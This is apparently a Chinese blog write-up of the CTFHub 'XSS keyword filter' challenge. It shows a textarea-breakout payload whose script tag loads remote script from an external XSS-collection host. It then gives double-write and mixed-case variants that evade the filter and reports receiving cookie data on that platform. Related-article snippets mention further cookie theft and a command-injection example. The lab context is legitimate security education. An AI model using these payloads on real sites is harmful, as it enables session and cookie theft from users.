CTFHub XSS 过滤关键词 WriteUp

最新推荐文章于 2024-03-28 22:00:00 发布
最新推荐文章于 2024-03-28 22:00:00 发布
阅读量750 收藏
点赞数 3
分类专栏: CTF 文章标签: xss 前端 ctf 漏洞 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49125123/article/details/131546199
版权

前文链接:DOM反射xss

这次直接浏览器输入payload,发现 script 被过滤掉了

</textarea>'"><script src=http://xsscom.com//cZ2vvZ></script>

在这里插入图片描述

碰到这种情况不要慌,下面给出两种方法绕过过滤关键字。

双写绕过

</textarea>'"><scrscriptipt src=http://xsscom.com//cZ2vvZ></scrscriptipt>

大小写绕过

</textarea>'"><Script src=http://xsscom.com//cZ2vvZ></scRipt>

上述两种方式提交后成功在xss平台收到数据:

在这里插入图片描述

提交flag,成功解出

在这里插入图片描述

CVE-柠檬i
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Springboot配置XSS过滤XssFilter.zip
12-31
直接可以运行,包含测试类,对HTML和SQL进行过滤,方便扩展。并且可以配置不拦截的路径,包含注释,方便学习。 博客地址:https://blog.csdn.net/u011974797/article/details/121792680
JSP使用过滤器防止Xss漏洞
10-17
本文将详细介绍如何使用过滤器(Filter)在JSP中有效地防止XSS攻击。 首先,我们需要了解XSS攻击的基本原理。当用户在Web表单中输入数据,这些数据未经适当的验证和编码直接显示在页面上时,攻击者可以通过注入恶意...
ctfhubxss
小宇的web博客
05-22 1617
ctfhubxss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解题流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
buuctf13(perl脚本GET open命令漏洞&redis主从复制&xss&ssti关键字过滤绕过&csrf)
weixin_63231007的博客
02-27 1095
[HITCON 2017]SSRFme & [网鼎杯 2020 玄武组]SSRFMe & [GWCTF 2019]mypassword & [GWCTF 2019]你的名字& [GKCTF 2021]CheckBot
CTFHub——XSS
2302_79119987的博客
03-28 843
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤
CTFHub靶场:XSS
NSQ0207的博客
07-25 330
放入脚本,使用$.getScript功能是异步加载并执行。​​​​​​​查看cookie的flag。检查是否存在弹窗,可以放在url地址栏上执行。​​​​​​​查看cookie的flag。​​​​​​​查看cookie的flag。​​​​​​​查看cookie的flag。查看cookie的flag。查看cookie的flag。有空格,用/代替 (/**/)
CTFHub | 过滤空格
尼泊罗河伯的博客
12-04 2383
根据网页显示内容提示,这题关于过滤空格注入,此题和其他的注入手法一致,只不过需要在网页 URL 中对 payload 语句中的空格符号进行过滤,判断发现此题存在过滤空格注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
ctfhub-过滤空格
m0_62094846的博客
12-15 882
<?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/ /", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $res = $m; }...
php实现XSS安全过滤的方法
10-23
主要介绍了php实现XSS安全过滤的方法,实例分析了php针对XSS进行安全过滤的相关技巧,具有一定参考借鉴价值,需要的朋友可以参考下
xss特殊字符拦截与过滤
最新发布
04-01
滤除content中的危险 HTML 代码, 主要是脚本代码, 滚动字幕代码以及脚本事件处理代码
xss测试代码大全javascript中的xss过滤
03-24
xss测试代码大全
XSS危险字符以及其处理方法
01-12
本文档包含了XSS危险字符的基本介绍,以及与其对应的在java以及JSP中的处理方法
CTFHub笔记之技能树 WEB过滤空格
weixin_48799157的博客
03-21 2250
小白一个,如果错误请指正! 首先我们常规的去注入一下,发现之前使用的句子行不通,原因是空格键被过滤掉了。 那我们就得去学习一下怎么绕过空格过滤: SQL注入绕过技巧 - VVVinson - 博客园1.绕过空格(注释符/* */,%a0): 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方https://www.cnblogs.com/Vinson404/p...
web-ctfctf-pikachu-XSS
一个努力生活的人的博客
06-27 2350
XSS-pikachu
xss跨站攻击【网络攻防CTF】(保姆级图文)
MZH
05-17 1200
xss跨站攻击【网络攻防CTF】(保姆级图文)
XSS的知识梳理
m0_62129839的博客
11-04 170
xss入门级总结,讲讲xss漏洞为什么存在
CTFHUB技能树详解(最全、最细、最易懂)
it_wzb的博客
09-29 4733
最近闲的无聊,玩玩CTF吧,并把自己的解题思路分享给大家。大佬多指教。
传说中的xss大集合
前端工程瓜
09-19 703
好吧我只是转载一下,这里几乎囊括了所有的xss攻击: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
XSS漏洞原理详解丨小白WEB安全入门
jennycisp的博客
06-27 1815
XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。在检测的开始,可以输入一些敏感字符,比如“、()”等,提交后查看网页源代码的变化以发现输入被输出到什么地方,且可以发现相关敏感字符是否被过滤
ctfhub xss
09-19
引用和引用[2]中提到的CTFHUB-XSS是一种攻击技术,通过构造恶意链接或在存在XSS漏洞的地方注入恶意脚本来获取用户的cookie信息。攻击者可以通过诱使受害者点击带有恶意脚本的链接,从而在自己搭建的XSS平台上记录下受害者的cookie信息。 引用中提到了获取cookie的方法,其中一种方法是在存在XSS漏洞的搜索栏中输入恶意脚本,但这种方法只能在受害用户的浏览器中弹出cookie,攻击者无法直接获得。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值